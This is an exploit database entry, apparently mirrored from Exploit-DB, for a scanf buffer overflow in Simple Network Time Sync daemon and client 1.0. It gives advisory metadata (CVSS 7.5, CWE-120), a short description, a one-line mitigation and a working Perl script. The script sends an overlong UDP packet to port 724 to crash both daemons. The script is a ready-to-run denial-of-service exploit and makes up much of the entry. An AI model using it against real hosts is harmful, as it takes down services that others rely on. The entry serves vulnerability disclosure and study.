Scanf Overflow in Simple Network Time Sync Daemon and Client

vendor:

Simple Network Time Sync Daemon and Client

by:

SecurityFocus

7.5

CVSS

HIGH

Buffer Overflow

120 (Buffer Copy without Checking Size of Input)

CWE

Product Name: Simple Network Time Sync Daemon and Client

Affected Version From: 1

Affected Version To: 1

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: RedHat 6.1

2002

Scanf Overflow in Simple Network Time Sync Daemon and Client

A scanf overflow has been discovered in the Simple Network Time Sync daemon and client version 1.0. Currently the buffer overflow has been tested on RedHat 6.1. It may be possible to obtain root, although it appears one only has 50 characters to run code with.

Mitigation:

Ensure that all input is properly validated and sanitized before being used in a scanf call.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/1289/info

A scanf overflow has been discovered in the Simple Network Time Sync daemon and client version 1.0. Currently the buffer overflow has been tested on RedHat 6.1. It may be possible to obtain root, although it appears one only has 50 characters to run code with.

#!/usr/bin/perl -w
#
# Usage: ./kill_sntsd <hostname>
#

use Socket;

send_packet(); # Needs to send 2 packets to kill the client and the server 
daemons
send_packet();

sub send_packet {

$proto = getprotobyname('udp');
$localaddr = gethostbyname("localhost") || die "error: $!\n";
$iaddr = gethostbyname($ARGV[0]) || die "$!\n";
$sin = sockaddr_in(724, $iaddr);
$paddr = sockaddr_in(53, $localaddr);
socket(SH, PF_INET, SOCK_DGRAM, $proto);
bind(SH, $paddr);

$|=1;

connect(SH, $sin) || die "$!\n";

# A string longer than 50 characters...
print SH "logistixlogistixlogistixlogistixlogistixlogistixlogistix\n";
close(SH);

}